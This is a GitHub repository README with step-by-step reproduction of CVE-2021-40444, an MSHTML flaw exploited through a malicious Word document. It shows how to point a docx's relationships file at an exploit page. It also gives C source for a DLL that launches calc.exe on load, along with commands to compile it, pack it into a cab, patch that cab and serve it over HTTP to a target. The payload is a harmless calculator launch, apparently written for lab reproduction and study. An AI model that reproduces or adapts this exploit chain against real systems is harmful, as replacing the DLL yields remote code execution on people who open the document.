Skip to content

L1nkd34d/CVE-2021-40444

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-40444

Reproduce steps for CVE-2021-40444

These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).

Generating docx

Go to maldoc/word/_rels/document.xml.rels and edit the two ocurrences for http://<HOST> with the URL to the exploit.html Eg.: http://127.0.0.1/exploit.html file.

Generate docx:

cd maldoc/ ; zip -r maldoc.docx *

Generating malicious cab

#include <windows.h>

void exec(void) {
	system("C:\\Windows\\System32\\calc.exe");
	return;
}

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved )
{
    switch( fdwReason ) 
    { 
        case DLL_PROCESS_ATTACH:
           exec(); 
           break;

        case DLL_THREAD_ATTACH:
            break;

        case DLL_THREAD_DETACH:
            break;

        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Exec:

i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Generate cab (install lcab sudo apt-get install lcab)

cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab

Copy out.cab into www/ directory, modify exploit.html to point to http://127.0.0.1/out.cab

Execute Python script: patch_cab.py

Finally, setup server:

cd www/ ; sudo python3 -m http.server 80

End

Execute now maldoc.docx in target VM

If not working, make sure there is a championship.inf file at C:\Users\<user>\AppData\Temp\

If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads.

More

To automatically resolve the array obfuscation on HTML file use deobfuscate.py (already has hardcoded the mutated array)

Anyway, there is already a deobfuscated version: deob.html

About

Reproduce steps for CVE-2021-40444

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • HTML 75.3%
  • Python 24.7%